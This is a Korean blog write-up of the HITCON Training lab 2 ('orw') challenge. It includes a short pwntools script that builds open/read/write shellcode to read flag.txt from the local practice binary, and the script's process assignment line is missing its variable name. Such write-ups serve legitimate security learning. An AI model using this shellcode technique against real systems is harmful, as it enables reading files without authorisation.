728x90

풀이


 

lab2 디렉토리로 가보니 orw.bin 이라는 바이너리가 있어 이를 ida로 열어보았다.

 

??

그냥 대놓고 쉘코드 넣으세용 하고 있어서 pwntools의 shellcraft를 사용했다. flag.txt 파일이 없어서 그냥 임의로 만들어서 익스를 했다 ㅎㅎ

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
 
 
= process("orw.bin")
 
pay = ""
pay += asm(shellcraft.open("./flag.txt"))
pay += asm(shellcraft.read("eax","esp",100))
pay += asm(shellcraft.write(1,"esp",100))
 
s.recvuntil("shellcode:")
 
s.sendline(pay)
 
s.interactive()
 
cs

 

 

 

flag 뚝딱

 

뚝딱!

'PWN > HITCON_Training' 카테고리의 다른 글

[HITCON_Training] LAB 6  (0) 2019.07.07
[HITCON_Training] LAB 5  (0) 2019.07.07
[HITCON_Training] lab 4  (0) 2019.07.05
[HITCON Training] LAB 3  (0) 2019.07.04
[HITCON Training] LAB 1  (0) 2019.07.03